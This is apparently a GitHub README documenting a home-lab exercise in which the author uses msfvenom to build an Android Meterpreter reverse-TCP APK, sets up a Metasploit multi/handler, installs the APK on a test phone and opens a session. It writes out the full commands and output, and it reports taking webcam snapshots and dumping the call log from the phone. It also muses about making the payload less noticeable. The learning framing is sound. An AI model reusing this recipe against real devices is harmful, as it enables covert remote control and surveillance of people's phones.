notsag-dev / basic-android-exploit-metasploit Goto Github PK

I'm doing this as an exercise to understand how Metasploit and Android exploits work. Needless to say that if you want to experiment with this do it with a phone you can reset right after to avoid any kind of issue. Also prefer doing it in a controlled environment like your home network.

• Attacker: MacOS High Sierra with Metasploit
• Victim: Android phone: Galaxy J2 Pro, Android 7.1.1

First, get your IP address (attacker) using ifconfig:

$ ifconfig en0 | grep 192
	inet 192.168.1.37 netmask 0xffffff00 broadcast 192.168.1.255

Note that here my interface is en0, you should put yours or leave it blank. Also | grep 192 is to get the line that has the IP address as I know it starts by 192. You may need to omit that part as well.

Use msfvenom (part of Metasploit) to generate the "malicious" apk (remember to use your IP adress here):

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.37 LPORT=4444 R > boom.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10188 bytes

Before copying and installing the apk on the phone, a handler that listens for connections (and eventually spawns shells ;)) has to be set on the attacker machine. This is done from msfconsole:

$ msfconsole
msf5 > use exploits/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.37
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.37:4444

Copy the apk file to the phone and execute it. I must say this looks really sketchy when installing it. It does not have a logo, the app's name seems to be MainActivity LOL, and it needs many permissions to be granted, check out the screenshot of the install screen.

Before being able to install it, you'll most likely need to change your settings as it the apk comes from an "unknown source". You'll also have to go through a series of warnings that look bad enough for anybody to understand it's not safe to install/open this file. I guess there are other ways of generating this apk so that it's not so noisy, but this one will be enough for the purpose of these notes.

After executing the app (not without having had to retry the install process), our handler pops a meterpreter session:

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.37:4444
[*] Sending stage (73742 bytes) to 192.168.1.60
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.60:42099) at 2020-06-06 20:50:50 +0200

So we can go ahead and check out the fun stuff now! You can enter help to see all the available commands of the meterpreter session. I verified some of them worked like webcam_stream, webcam_snap and dump_calllog 🙈

My first conclusion on this experiment is that Metasploit rocks! It's so easy to generate a payload that would provide full control over an Android phone. I can very much imagine this being used as an ad-hoc remote control tool for which you generate the apk dinamically, how cool is that?! It's also open source so it's great as a learning resource.

From an attacker's point of view, the default apk seems quite noisy, but I guess the exploit generation can be tweaked a bit in order for the exploit to be less noisy.